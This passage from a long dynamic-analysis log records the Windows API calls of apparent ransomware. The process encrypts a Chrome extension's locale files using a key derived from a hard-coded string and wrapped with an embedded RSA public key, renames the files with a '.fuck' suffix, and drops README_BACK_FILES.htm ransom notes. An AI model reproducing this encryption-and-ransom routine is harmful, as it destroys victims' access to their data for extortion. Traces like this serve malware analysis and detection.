lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.029] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.029] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.029] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.029] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.029] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.029] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.029] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.029] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.029] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.029] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.030] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.030] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.030] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.030] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.030] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.030] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.030] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.030] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.030] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.030] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.030] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.030] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.030] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.030] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.030] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.030] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.030] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.031] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.031] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.031] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.031] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.031] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.031] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.031] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.031] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.031] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.031] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.031] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.031] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.031] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.031] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.031] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.031] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.031] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.031] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.032] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.032] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.032] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.032] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.032] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.032] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x1fd, lpOverlapped=0x0) returned 1 [0264.032] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1fd, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x200) returned 1 [0264.032] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x200, lpOverlapped=0x0) returned 1 [0264.032] CloseHandle (hObject=0x5d5c) returned 1 [0264.032] CloseHandle (hObject=0x5d60) returned 1 [0264.032] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json"), bFailIfExists=0) returned 1 [0264.035] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json", dwFileAttributes=0x0) returned 1 [0264.036] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.gsg")) returned 1 [0264.037] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.fuck")) returned 1 [0264.038] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0264.038] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0264.038] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.038] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0264.038] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0264.038] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\readme_back_files.htm")) returned 0xffffffff [0264.038] AreFileApisANSI () returned 1 [0264.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0264.038] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0264.039] GetFileType (hFile=0x5d64) returned 0x1 [0264.039] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0264.040] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.040] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0264.040] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.040] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.040] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0264.040] GetLastError () returned 0x0 [0264.040] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json")) returned 0x20 [0264.040] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json", dwFileAttributes=0x80) returned 1 [0264.041] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0264.042] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0264.043] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0264.044] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0264.046] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0264.046] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.046] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.046] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0264.046] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.046] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0264.046] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e76650) returned 1 [0264.046] CryptImportPublicKeyInfo (in: hCryptProv=0x2e76650, dwCertEncodingType=0x1, pInfo=0x2eaed50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaed80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaed88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ec00) returned 1 [0264.046] CryptEncrypt (in: hKey=0x2e7ec00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0264.046] CryptEncrypt (in: hKey=0x2e7ec00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e76a90*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e76a90*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0264.046] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e76a90*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e76a90*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0264.047] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.052] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.052] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.061] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.061] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.061] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, 